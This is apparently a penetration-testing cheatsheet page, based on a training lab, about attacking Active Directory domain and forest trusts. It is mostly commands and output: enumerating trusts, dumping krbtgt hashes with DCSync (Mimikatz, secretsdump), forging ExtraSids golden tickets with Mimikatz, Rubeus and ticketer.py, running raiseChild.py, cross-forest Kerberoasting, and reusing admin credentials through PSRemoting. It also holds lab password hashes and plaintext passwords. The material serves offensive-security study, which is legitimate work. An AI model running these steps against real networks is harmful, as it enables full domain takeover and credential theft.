🛠️Trust Attacks

Enumeration

Import-Module activedirectory
Get-ADTrust -Filter *
Import-Module .\Powerview.ps1
Get-DomainTrust
Get-DomainTrustMapping

Checking Users in the Child Domain using Get-DomainUser

Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName

Using netdom to query domain trust

netdom query /domain:inlanefreight.local trust

Using netdom to query domain controllers

netdom query /domain:inlanefreight.local dc

Using netdom to query workstations and servers

netdom query /domain:inlanefreight.local workstation

Attacking Domain Trust Child - Parent Trust from Windows

SID History Primer

The sidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain. SID history is intended to work across domains, but can work in the same domain. Using Mimikatz, an attacker can perform SID history injection and add an administrator account to the SID History attribute of an account they control. When logging in with this account, all of the SIDs associated with the account are added to the user's token.

This token is used to determine what resources the account can access. If the SID of a Domain Admin account is added to the SID History attribute of this account, then this account will be able to perform DCSync and create a Golden Ticket or a Kerberos ticket- granting ticket (TGT), which will allow for us to authenticate as any account in the domain of our choosing for further persistence.

  • https://www.thehacker.recipes/ad/persistence/sid-history

Extra SID - Mimikatz

This attack allows for the compromise of a parent domain once the child domain has been compromised.

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain (does not need to exist!)

  • The FQDN of the child domain.

  • The SID of the Enterprise Admins group of the root domain.

  • With this data collected, the attack can be performed with Mimikatz

Obtaining the KRBTGT Account's NT Hash using Mimikatz

PS C:\htb> mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

Get-DomainSID We can use the PowerView Get-DomainSID function to get the SID for the child domain, but this is also visible in the Mimikatz output above

PS C:\htb> Import Powerview.ps1
PS C:\htb> Get-DomainSID
S-1-5-21-2806153819-209893948-922872689

**Obtaining Enterprise Admins Group's SID using Get-DomainGroup

# using activedirectory module
Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL"
# using powerview
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

  • The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f

  • The SID for the child domain: S-1-5-21-2806153819-209893948-922872689

  • The name of a target user in the child domain (does not need to exist to create our Golden Ticket!): We'll choose a fake user: hacker

  • The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL

  • The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050-3880317879-2865463114-519

Creating Golden Ticket with Mimikatz

PS C:\htb> mimikatz.exe 
mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948- 922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21- 3842939050-3880317879-2865463114-519 /ptt

Confirming a Kerberos Ticket is in Memory Using klist

PS C:\htb> klist

Extra-Sid Attack - Rubeus

PS C:\htb> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948- 922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

Performing a DCSync Attack

PS C:\Tools> .\mimikatz.exe
mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm


mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm /domain:INLANEFREIGHT.LOCA

Attacking Domain Trust Child - Parent Trust from Linux

We'll still need to gather the same bits of information

  • This attack allows for the compromise of a parent domain once the child domain has been compromised.

  • The KRBTGT hash for the child domain

  • The SID for the child domain

  • The name of a target user in the child domain (does not need to exist!)

  • The FQDN of the child domain.

  • The SID of the Enterprise Admins group of the root domain.

Performing DCSync using secretsdump.py in Child

secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc- user LOGISTICS/krbtgt 

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation 
Password: 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) 
[*] Using the DRSUAPI method to get NTDS.DIT secrets krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9d765b482771505cbe97411065964d 5f::: 
[*] Kerberos keys grabbed 
krbtgt:aes256-cts-hmac-sha1- 96:d9a2d6659c2a182bc93913bbfa90ecbead94d49dad64d23996724390cb833fb8 
krbtgt:aes128-cts-hmac-sha1-96:ca289e175c372cebd18083983f88c03e 
krbtgt:des-cbc-md5:fee04c3d026d7538 
[*] Cleaning up..

Performing SID Burte Forcing using lookupsid.py

lookupsid.py logistics.inlanefreight.local/[email protected]
Password: [*] Brute forcing SIDs at 172.16.5.240 
[*] StringBinding ncacn_np:172.16.5.240[\pipe\lsarpc] 
[*] Domain SID is: S-1-5-21-2806153819-209893948-922872689

Looking for the Domain SID

lookupsid.py logistics.inlanefreight.local/[email protected] | grep "Domain SID"
Password: [*] 
Domain SID is: S-1-5-21-2806153819-209893948-92287268

Grabbing the Domain SID & Attaching to Enterprise Admin's RID

lookupsid.py logistics.inlanefreight.local/[email protected] | grep -B12 "Enterprise Admins"
Password: 
[*] Domain SID is: S-1-5-21-3842939050-3880317879-2865463114 
498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup) 
500: INLANEFREIGHT\administrator (SidTypeUser)
501: INLANEFREIGHT\guest (SidTypeUser) 
502: INLANEFREIGHT\krbtgt (SidTypeUser) 
512: INLANEFREIGHT\Domain Admins (SidTypeGroup) 
513: INLANEFREIGHT\Domain Users (SidTypeGroup) 
514: INLANEFREIGHT\Domain Guests (SidTypeGroup) 
515: INLANEFREIGHT\Domain Computers (SidTypeGroup) 
516: INLANEFREIGHT\Domain Controllers (SidTypeGroup) 
517: INLANEFREIGHT\Cert Publishers (SidTypeAlias) 
518: INLANEFREIGHT\Schema Admins (SidTypeGroup) 
519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup)

  • The KRBTGT hash for the child domain: 9d765b482771505cbe97411065964d5f

  • The SID for the child domain: S-1-5-21-2806153819-209893948-922872689

  • The name of a target user in the child domain (does not need to exist!): hacker

  • The FQDN of the child domain: LOGISTICS.INLANEFREIGHT.LOCAL

  • The SID of the Enterprise Admins group of the root domain: S-1-5-21-3842939050- 3880317879-2865463114-519

Constructing a Golden Ticket using ticketer.py

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948- 922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
...
[*] Saving ticket in hacker.ccache]
export KRB5CCNAME=hacker.ccache

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/[email protected] -k -no-pass - target-ip 172.16.5.5

Performing the Attack with raiseChild.py

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

Cross-Forest Kerberoasting

Enumerating Accounts for Associated SPNs Using Get-DomainUser

Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
samaccountname 
-------------- 
krbtgt 
mssqlsvc

Enumerating the mssqlsvc Account

PS C:\htb> Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc |select samaccountname,memberof

samaccountname memberof 
-------------- -------- 
mssqlsvc CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL

Performing a Kerberoasting Attacking with Rubeus Using /domain Flag

PS C:\htb> .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
[*] Total kerberoastable users : 1 
[*] SamAccountName : mssqlsvc 
[*] DistinguishedName : CN=mssqlsvc,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL 
[*] ServicePrincipalName : MSSQLsvc/sql01.freightlogstics:1433 
[*] PwdLastSet : 3/24/2022 12:47:52 PM 
[*] Supported ETypes : RC4_HMAC_DEFAULT 
[*] Hash : $krb5tgs$23$*mssqlsvc$FREIGHTLOGISTICS.LOCAL$MSSQLsvc/sql01.freightlogstic s: *$<SNIP>

Admin Password Re-Use & Group Membership

From time to time, we'll run into a situation where there is a bidirectional forest trust managed by admins from the same company.

Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL 
GroupDomain : FREIGHTLOGISTICS.LOCAL 
GroupName : Administrators 
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=FREIGHTLOGISTICS,DC=LOCAL 
MemberDomain : FREIGHTLOGISTICS.LOCAL 
MemberName : S-1-5-21-3842939050-3880317879-2865463114-500 
MemberDistinguishedName : CN=S-1-5-21-3842939050-3880317879-2865463114- 500,CN=ForeignSecurityPrincipals,DC=FREIGHTLOGIS TICS,DC=LOCAL 

PS C:\htb> Convert-SidToName S-1-5-21-3842939050-3880317879-2865463114-500 INLANEFREIGHT\administrator 

PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA- DC03.FREIGHTLOGISTICS.LOCAL -Credential -Credential INLANEFREIGHT\administrator

PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami 
inlanefreight\administrator

PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all


Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03 
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL 
Node Type . . . . . . . . . . . . : Hybrid 
IP Routing Enabled. . . . . . . . : No 
WINS Proxy Enabled. . . . . . . . : No 
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCA

Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

Cross-Forest Kerberoasting

GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

Hunting Foreign Group Membership with Bloodhound-python

  • First domain

cat /etc/resolv.conf
# run "resolvectl status" to see details about the actual nameservers. 
#nameserver 1.1.1.1 
#nameserver 8.8.8.8 
domain INLANEFREIGHT.LOCAL 
nameserver 172.16.5.5
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2

  • Second domain

cat /etc/resolv.conf 
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8) 
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN 
# 127.0.0.53 is the systemd-resolved stub resolver. 
# run "resolvectl status" to see details about the actual nameservers. 
#nameserver 1.1.1.1 
#nameserver 8.8.8.8 
domain FREIGHTLOGISTICS.LOCAL 
nameserver 172.16.5.238
bloodhound-python -d FREIGHTLOGISTICS.LOCAL -dc ACADEMY-EA- DC03.FREIGHTLOGISTICS.LOCAL -c All -u [email protected] -p Klmcargo

Upload both data (first and second domain) to bloodhound and select:

  • Users with Foreign Domain Group Membership

PreviousKerberos Attack CheatsheetNextLinux Privilege Escalation

Last updated